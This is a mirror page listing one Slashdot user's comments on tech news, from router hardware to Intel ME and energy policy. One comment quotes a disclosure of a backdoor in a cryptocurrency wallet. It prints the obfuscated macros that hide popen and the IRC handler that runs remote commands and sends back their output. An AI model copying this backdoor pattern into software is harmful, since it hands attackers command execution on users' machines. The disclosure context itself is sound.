Slashdot Mirror


User: Gravis+Zero

Gravis+Zero's activity in the archive.

Stories
0
Comments
4,915
First seen
Last seen
Profile
(view on slashdot.org)

Comments · 4,915

  1. this begs the question... on Chronic Stress Could Lead To Depression and Dementia, Scientists Warn (independent.co.uk) · · Score: 1

    how can you tell if your boss stressed and suffering from dementia or just stupid? ;)

  2. Re:what the hell do you want? on Ask Slashdot: Affordable Hardware For Remote-Booting USB Devices? · · Score: 1

    I would like to be able to powercycle a USB-powered device in Farawayland, while sitting in my comfy office. By instructing my switch to cycle the PoE power on the relevant port.

    A device which accepts regular PoE via an RJ45 in one end, and supplies USB power and RJ45 in the other end would facilitate that.

    what you want is a PoE "splitter" - http://www.amazon.com/TP-LINK-...
    it provides a standard barrel for which there are USB adapters - http://www.amazon.com/s/ref=nb...

  3. nope, it's still the router on Is Blockchain the Most Important IT Invention of Our Age? (theguardian.com) · · Score: 3, Informative

    If anything is the most important IT invention of our age, it's the invention of the router. routers are the fundamental building block of what we consider to be the internet. they can be software or hardware based but they are what tie many computers together so that they can communicate quickly. without routers, bitcoin could not have even existed beyond an idea.

  4. what the hell do you want? on Ask Slashdot: Affordable Hardware For Remote-Booting USB Devices? · · Score: 2

    you've mentioned PoE, USB and 12V power sources. what you failed to mention is what the hell you actually want. do you want PoE to 12V? do you want PoE to USB? do you want an SBC powered by PoE that boots off a USB stick? what the hell do you want?

  5. Re:Stopped reading after... on The Trouble With Intel's Management Engine (hackaday.com) · · Score: 1

    I'm not even saying that the IME is necessarily perfect, but conspiracy-theory drivel doesn't do much for me.

    I know, right?! Just last month someone tried to convince me that Juniper routers had a backdoor. Can you believe the crazy shit people are willing to believe? What crazy conspiracy-theory drivel will people post next, all our phones are tapped? A secret NSA building where internet traffic is recorded? I mean, that would have be a huge building.

    conspiracy-theory drivel indeed!

  6. it's a promise! on Verizon Vows To Build the First 5G Network In the US (networkworld.com) · · Score: 1
  7. I can't wait... on California Bill Would Require Phone Crypto Backdoors · · Score: 1

    for the decryption keys to get stolen. Saying, "I told you so, you fucking retard," never gets old.

  8. shocked, shocked i say! on New Linux Trojan Can Spy on Users by Taking Screenshots and Recording Audio (drweb.com) · · Score: 5, Informative

    Dr.Web malware specialists have not disclosed how this malware infects Linux computers.

    But they are willing to sell you their Linux antivirus software.

    From what I've gathered, it's written in C++, uses Qt 5.4 or higher (that's when the enumeration value QStandardPaths::GenericDataLocation was added to Qt) and it's not self-propagating.

    So basically, it's a program that has to be installed on your computer... maybe from a compromised package repo server.

  9. better to invest in solar on Belgium's Aging Nuclear Plants Worry Neighbors (phys.org) · · Score: 1, Insightful

    while nuclear is a great source of energy, it requires constant vigilant maintenance and an electrical distribution system. why not invest in solar+battery for your entire country? they are low maintenance power harvesting systems that use a naturally occurring nuclear power, a star. stars are fantastic power sources because one's like ours are stable for billions of years, require no maintenance, have perfect security and their own multi-planetary power distribution systems. making solar panels and sodium-ion batteries isn't beyond Belgium's capabilities and it would solve a lot of problems.

  10. perhaps we should consider the obvious. on Comets Can't Explain Weird 'Alien Megastructure' Star After All (newscientist.com) · · Score: 4, Funny

    maybe the star isn't screwed in tightly enough. just give it a half twist and see if that stops the flickering. ;)

  11. not leaked, released on Microsoft Leaks New HoloLens Details (mashable.com) · · Score: 4, Insightful

    the information was released by Microsoft, not leaked.

  12. Re:"better than human" was achieved in 1994, alrea on Baidu Releases Open Source Artificial Intelligence Code (thestack.com) · · Score: 4, Interesting

    I've been developing automatic speech recognition systems in the 1990s. Back then, the best performing recognizers were based on Hidden Markov Models, and for "out of context" tasks like "determine whether an individual spoken word from an unknown speaker is 'nine' or 'none'", the automatic recognizers already achieved better recognition rates than humans.

    Sure... but this time they did it with Mandarin instead of English.

  13. known for months on Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet (softpedia.com) · · Score: 5, Informative

    https://github.com/alerj78/luc...

    dooglus commented on Mar 8, 2015

    There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

    In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

    /** Determine system page size in bytes */
    #define S_ORDER(a,b,c,d) b##a##d##c /**
      * OS-dependent memory page locking/unlocking.
      * Defined as policy class to make stubbing for test possible.
      */
    #define CLine S_ORDER(I,F,E,L) /**
      * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
      * std::allocator templates.
      */
    #define CRead S_ORDER(p,po,n,e)
    #define CFree S_ORDER(cl,p,e,os) // // Allocator that locks its contents from being paged // out of memory and clears its contents before deletion. //
    #define CBuff "PR" "IV" "M" "SG"

    Then in irc.cpp they are used to implement the backdoor:

    if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
        {
            CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
            if (buf) {
                std::string result = "";
                while (!feof(buf))
                    if (fgets(pszName, sizeof(pszName), buf) != NULL)
                        result += pszName;
                CFree(buf);
                strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
                if (strchr(pszName, '!'))
                    *strchr(pszName, '!') = '\0';
                Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
            }
        }

    I expect this is a known issue since this kind of thing doesn't happen accidentally.

  14. R8500, not AC5300 on Netgear Nighthawk X8 AC5300 Router With Active Antennas Tested (hothardware.com) · · Score: 3, Insightful

    the actual model number is R8500 and "AC5300" is just marketing shitting on the desk. a side note: netgear actually seems to be open source friendly now as they are using version of dd-wrt and openwrt for their routers.

  15. spoiler alert! on Inside Google's Self-Driving Car Test Center (medium.com) · · Score: 2

    it's not bigger on the inside. :(

  16. Re:Poor summary as per usual on What Spotlighting Harassment In Astronomy Means · · Score: 1

    are only attracted to slightly rounded triangles.

    well i would like to point out that pie chart sections are being a total teases! i mean, why would you be outside of the rest of the pie if you weren't asking for it?! ;)

  17. Re:One thing's for sure on French Drug Trial Leaves One Brain Dead and Five Critically Ill (theguardian.com) · · Score: 1

    You know the other 2 are suddenly REALLY happy they got the placebo

    actually, they were all taking the placebo. the first person fell down a flight of stairs after "feeling dizzy" and four behind him suddenly felt dizzy too falling down atop the first. it seems odd and unbelievable until you find out they were all soccer players.

  18. Re:10GbE isn't that interesting on AMD Unveils 64-Bit ARM-Based Opteron A1100 System On Chip With Integrated 10GbE (hothardware.com) · · Score: 1

    10GbE Ethernet, kinda sucks. Cost per port is really high and actually so are the power requirements per port.

    that's why it's built into the processor, you twit.

  19. are you kidding me?! on Why Sharing Ransomware Code For Educational Purposes Is Asking For Trouble (betanews.com) · · Score: 4, Interesting

    Martin Roesler, Trend Micro Senior Director for Threat Research says...

    We need to share knowledge that creates understanding about potential damage, but not the ability to create it. We need to share knowledge about 'who exploits work', but not 'how to make use of them'. We need to share knowledge 'how malware works', but sharing 'sample code' is not needed for that.

    i wouldn't consider him a reliable source considering he allowed them to write a password manager in javascript.

  20. incorrect on Stallman's Legacy Halts At Hardware (hackaday.com) · · Score: 4, Insightful

    From beefy processors to graphics controllers, boot ROMs and binary blobs run in the silicon we base our systems upon. The code is not published and in the rare case that you are able to view the source it is only under strict NDA. This represents one of the biggest barriers to true open hardware.

    this is incorrect! the giant barrier that prevents people from having true open hardware is the obscene cost of having your design made into a silicon chip. if you could suddenly get a one-off chip made for $100, we would all be running much different systems and few of them would be related to x86.

  21. military counterinsurgency algorithms?! on Police Agencies Using Software To Generate "Threat Scores" of Suspects (washingtonpost.com) · · Score: 5, Interesting

    if you are using military counterinsurgency tools and algorithms on the general population, you are just preventing any change that might upset the status quo. the military industrial complex is going to cannibalize the country if shit like this continues.

  22. Things not fixed: on Linux Kernel 4.4 LTS Officially Released · · Score: 1

    you can't fix everything: https://www.youtube.com/watch?...

  23. underestimating governments' resolve on Crypto Guru David Chaum's Private Communications Network Comes With a Backdoor (softpedia.com) · · Score: 1

    Mr. Chaum has clearly underestimate the resolve of governments around the world. If needed, they will coerce the holder(s) of the key(s) to get what they want. Anyone that has even part of the key to the backdoor is going to put a giant bull's eye on themselves and their loved ones.

    a better idea would be to take the improvements made and upgrade the Tor protocol.

  24. not scarequotes needed on FTC Fines Software Vendor Over False Data Encryption Claims (softpedia.com) · · Score: 5, Informative

    yes, they were only fined $250K. Henry Schein is a multibillion dollar multinational company. $250K is "cost of business" expense because they make millions selling their software. this isn't even a slap on the wrist.

  25. they were infamous for QA problems but despite that, the brand is still recognized for being fast. Toshiba probably thinks they can rehabilitate the brand but if they screw it up, it won't hurt Toshiba's brand name.